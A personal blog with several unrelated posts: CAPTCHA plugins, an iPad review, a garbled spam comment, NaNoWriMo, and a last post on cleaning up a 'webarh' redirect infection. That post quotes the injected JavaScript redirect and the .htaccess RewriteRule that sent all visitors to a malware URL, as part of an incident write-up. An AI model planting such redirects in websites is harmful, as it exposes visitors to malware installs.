Spam what spam? CAPTHA cures all…

I’m quite impressed by how effective just adding a CAPTCHA to my site has been in preventing spam comments/user registrations. I know it’s to be expected but I’ve gone from getting 170 spam comments and about 30 spam registrations a day to just one spam comment and no registrations.

Currently I’m using the SI Captcha for WordPress, does anyone know of one that is better? I installed Solvemedia’s CAPTCHA plugin which makes people type in the words from adverts as a CAPTCHA and supposedly allows you to earn “MEGA BUCKS” in doing so. But it asked for my accountants details and I don’t have an accountant, Also I expect that it’s US ads only…

Here is a video about their CAPTCHA which I think at the heart of it is a good idea:

Solve Media from Solve Media on Vimeo.

I particularly like CAPTCHAs that make you think, like adding numbers, or asking general knowledge questions, although I was very disappointed in T3 who’s CAPTCHA is the question who makes the iPod, which doesn’t accept Foxconn as an answer, I’d expect more from a technology magazine…

It would be quite cool to have CAPTCHA that made you play a round of space invaders or Pacman or something like that and wouldn’t let you comment till you win… Hmmm… Cool maybe, annoying definitely.

Meh…

The iPad: I Take It Back It’s Actually Pretty Cool

I’ve been a stark opponent of the iPad, I think as part of my Android advocacy I was blinded to this device and tarred it with the same brush I tar the iPhone. Initially I think the heinous price was my main issue; although I still think that the device is ridiculously expensive. I’ve still got some issues with missing features, notably the lack of an SD card slot.

However I’ve had a chance to play with Avarinne’s new iPad and I have to say I’m impressed, it’s not an oversized iPhone/iPod Touch, it’s a netbook without a physical keyboard running a sleek UI. The device its self is wonderfully thin, the screen is bright and crisp, and the battery lasts for ages.

Apps wise I have to admit that the apps available for the iPad knock the pants off anything that’s available in the Android market, not for functionality but for sheer polish. Many, note: not all, Android apps look like someone cobbled them together with gaffa tape in an evening from code they found on a tutorial online, while the fact that anyone can release an app to the Android market is a good thing it does mean that a lot of dross gets through, people even post their hello world applications to the market, sometimes opting to charge for them…

As much as I disagree with Apple’s review process, it does separate the wheat from the chaff, and I think because of this the wheat is overall of better quality. Also the fact that the iOS has Apple’s backing means that there are an awful lot of “Official” versions of games available, like Settlers of Catan, Carcassonne and Scrabble. All of these should be on the Android market none of them are.

I don’t know why they aren’t I think Android has the hacker community hooked, but it’s yet to convince big business that it’s a viable platform. Maybe they don’t want to take the risk of developing for a platform where people are used to getting everything for free? Maybe it’s the fact that it’s a lot easier to pirate Android software because you can install software that hasn’t come from the market? Maybe it’s the fact that despite the fact that Android is supposedly gaining market share over the iPhone, people who buy iPhones buy them because of the apps and people who buy Android phones buy then because they are what the guy in the shop recommends they get as the latest whizbang gizmo, so they don’t even bother to explore the apps.

It’s not like Android users don’t download good software when it is released, when Angry Birds was released for Android, so many people downloaded it that it brought down the servers of GetJar. With any luck that will prove to people that Android users are willing to download software. The problem is that they were all free downloads, Angry Birds on Android is add supported, so no one bought it.

I think that’s one of the major issues, Android users have a sense of entitlement to free software, if they can’t get it for free they don’t bother, or they pirate it. I’ve only bought one game on my phone, Avarinne has bought 2 and a live wallpaper. Contrast this with the fact that within minutes of getting her iPad Avarinne had bought several apps and was merrily playing about with them?

Are apps easier to find on the iPad? Are they better? Are they easier to buy? I don’t know. But do know that I am impressed with the iPad. I wouldn’t pay £600 odd pounds to get one outright because I never have that kind of money lying about, but I would consider paying £199 and then a monthly subscription for data to cover the cost, it just so happens that both Three and Orange have just announced that exact deal. £25/a month for 15 Gig internet on Three and £27-£25/month on Orange (Depending on whether you have an existing Orange contract) for just 1 Gig. Both at however 24 month contracts and you end up paying £200 more than you would have for the iPad had you bought in in store, that £200 is £40 less than you would have paid for £10/month contract for data though so it is a case of swings and roundabouts.

One of the things that stopping me from going for it now (Aside from the fact that I’m broke) is that I keep hearing rumours of an iPad 2 coming out possibly as soon as February, no doubt it will be more expensive and will have a slew of features that the current one doesn’t, I’m banking on:

  1. An SD Slot, possibly also a USB.
  2. A front facing camera for FaceTime
  3. A slightly better screen, I’d love it to be a PixelQi but thats doubtful
  4. A Faster (Dual Core?) processor.
  5. Slightly better battery life (I’d reckon 12-14 rather than current 10)
  6. HDMI mini out, or mini display port (Apple like Display Port)
  7. Better Support for mobile networks in the US which no one outside of America cares about.

Lets see if I’m right…

Awesomely Confusing Spam Comment

I use Akismet to block spammy comments from the blog, I don’t regularly get very much spam but today there were 22 new spam messages, among them was this gem:

I give birth to be familiar with a few of the articles on your website trendy, and I extremely like your style of blogging. I added it to my favorites entanglement stage roster and last will and testament be checking back soon. Divert check into public notice my orientation as highly and vindicate me conscious what you think. Thanks

It looks like it’s been passed through an auto translator and backwards about 20 times, but there is a certain poetry to it…

The link was to a Finnish site advertising “Instant Loans” (Thank you Google Translate). I have to say it’s brightened up my otherwise snowy day.

NaNoWriMo: After the Dust Has Settled…

First I’m going to to say this… I did not win NaNoWriMo this year, I did write 32,152 words that I would not have written otherwise though which is something I am proud of. For anyone who is interested here is a breakdown of how it went down:

I started fairly well, the reason I don’t have a word count on the first day was that I couldn’t access the NaNoWriMo website because it was so busy. About halfway through I hit the wall as it were, I had a few social events that got in the way and I got a seriously bad case of writers block.

My main issue was that I bit off more than I could chew with my story, I wanted to write something epic, filled with intrigue in a grim and perilous world, but I hadn’t planned enough for that kind of writing, I had a beginning and a vague concept for the world, but I didn’t have a middle or an end. Also looking at how the story was panning out it was going to be much much more than 50,000 words…

I think for NaNoWriMo your story has to slightly whimsical, and able to change at a moments notice. I do admit that I used the “A man bursts in with a gun” technique” once when I was at a complete loss for where to go.

Next year I will try something more within my comfort zone, and something where I can just go on a tangent when I need to without worrying about it destroying my whole world.

I read an article by Max Barry called 15 ways to write a novel on the 30th and I kind of agree with some of what he said, NaNoWriMo is a rubbish way to write a novel, it’s a great way to get you writing though, which I suppose can lead to writing a novel.

I’m a little disappointed I didn’t finish but I’m really glad I participated. I’m also glad that November is over and that I have my evenings back, it was really exhausting coming home everyday knowing that I had to spend the entire evening trying to get myself to write, I cancelled pretty much all of my social engagements and locked myself in a room for pretty much all of my spare time. Now I just feel weird for not writing, the closest sensation I’ve experienced is when I walked out of my final exam at university having spent months studying, I didn’t know what to do with myself, it was almost as if I’d forgotten what I did in the evenings before there was a NaNoWriMo…

Webarh? More like Web Aargh!

Earlier this weekend I got a Facebook message from a friend saying that my website was redirecting to a malware site. Thankfully I was near a computer and had a look at it, every page view was redirecting to a site that installed malware on your computer. Thankfully most browsers recognise this fact and present you with a warning page.

I did some hunting and it turns out I had been infected with webarh redirect virus (Also reffered to as funnysignage as it uses the same mode of attack), this virus has added the following  line to any index.php files it found:

<script>

document.location.href=’http://webarh.com/07628e5249a8b3459e49860dc9045837′;

</script>

Note the numbers at the end are just a random identifier, probably so that they can tell where it originated.

And it had also gone through pretty much every directory either replacing or adding a .htaccess file with the following content:

RewriteEngine On
RewriteBase /
RewriteRule ^(.*)? http://webarh.com/07628e5249a8b3459e49860dc9045837

For the non tech savvy the first bit tells your web browser to redirect to (Don’t go to that link, bad things will happen):

“http://webarh.com/07628e5249a8b3459e49860dc9045837”

The other tells my web server to send all requests for ANY PAGES to that same URL. It’s a two pronged attack, if you have script blocking software on your browser the .htaccess file makes the server send you to the malware site, if your server ignores the .htaccess file, then there is a chance that the script will be work. Eitherway when you end up at that URL no doubt the website tries to exploit whatever vulnerabilities exist in your browser to install bad software on your computer.

I diligently deleted all the .htaccess files and removed the script line from every file I could find it in. I did a grep for webarh.com over the entire website, and removed any references to it I could find, I even changed the ftp password on my site because I read that sometimes that’s how webarh infects your server. It looked like all was good for about 18 hours my site was back up and running and everything was hunky dory. At about midnight last night I got a text from someone else telling me  my site was broken again. I check and sure enough it was redirecting again, but only partially, some of the other domains I host in subdirectories of my web space were okay.

I’d heard that the webarh/funnysignage redirect sometimes puts back doors into your site, I didn’t have the time to look through every php file on my server which hosts 4 wordpress installs and a phpbb install so I took a deep breath and deleted everything… Most of my content was in the database, the only content that wordpress stores on disk is images and stuff you have uploaded. Of course I took a backup of the site beforehand just in case.

I’ve so far restored two of my wordpress blogs, and everything seems okay, I deleted an old version of phpMyAdmin I had lying about from before my service provider gave me direct access to the database. I’ve not deleted the phpBB install yet as that didn’t seem to be infected aside from the fact that the .htaccess file was causing everything to redirect to the malware site. So the next step would be to remove that too.

Fingers crossed it’s all looking good, if it happens again then I’m going to be a little more worried, either:

  • There is a backdoor in the SQL somewhere, then I’m really screwed.
  • There is a backdoor in phpBB, in which case I’ll have to reinstall that.
  • There is a virus on my computer which is picking up the the FTP password and using it to wreak havoc on my website…

I’m hoping that None of the above apply… And that I’ll be safe from here on out, I think that the root cause of this was the fact that one of my sites didn’t have the latest version of WordPress installed on it, my reasoning behind this is that WordPress recently released a security update that allowed code to be executed etc… I’d updated my main site but had forgotten to update the others.

I’d appreciate anyone who notices any issues on my website getting in touch with me to tell me so.